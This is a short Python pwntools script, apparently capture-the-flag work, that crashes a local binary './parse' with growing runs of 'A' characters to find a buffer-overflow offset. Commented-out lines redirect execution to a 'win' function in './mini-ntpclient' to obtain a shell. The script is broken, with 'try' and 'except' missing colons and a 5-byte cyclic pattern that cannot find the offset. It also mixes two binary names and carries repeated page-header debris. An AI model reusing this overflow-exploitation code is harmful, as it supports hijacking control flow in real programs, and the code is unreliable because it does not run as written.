47 lines
1.3 KiB
Python
47 lines
1.3 KiB
Python
from pwn import *
|
|
context(arch = 'amd64', os = 'linux')
|
|
|
|
# Generate a cyclic pattern so that we can auto-find the offset
|
|
payload = cyclic(5)
|
|
|
|
# Run the process once so that it crashes
|
|
p = process(['./parse'])
|
|
p.sendline(payload)
|
|
# Get the core dump
|
|
core = Coredump('./core')
|
|
|
|
# Our cyclic pattern should have been used as the crashing address
|
|
print(type(pack(core.rip)))
|
|
print(type(payload))
|
|
#assert pack(core.rip) in payload
|
|
|
|
|
|
for i in range(50, 350):
|
|
p = process(['./parse'])
|
|
p.sendline("A" * i)
|
|
received = p.recvline() # output from program
|
|
try
|
|
received += p.recvline() # Segmentation fault if crash else empty
|
|
if 'Segmentation' in str(received):
|
|
# For some reason when sent through pwntools the buffer to crash was 1 length longer than
|
|
# it should have been?
|
|
print('Crash at %d characters' % (i - 1))
|
|
print('Crash at value will be %s' % hex(i - 1))
|
|
break
|
|
except
|
|
pass
|
|
|
|
|
|
|
|
# Cool! Now let's just replace that value with the address of 'win'
|
|
#crash = ELF('./mini-ntpclient')
|
|
#payload = fit({
|
|
# cyclic_find(core.rip): crash.symbols.win
|
|
#})
|
|
|
|
# Get a shell!
|
|
#io = process(['./mini-ntpclient' , payload])
|
|
#io.sendline(b'id')
|
|
#print(io.recvline())
|
|
# uid=1000(user) gid=1000(user) groups=1000(user)
|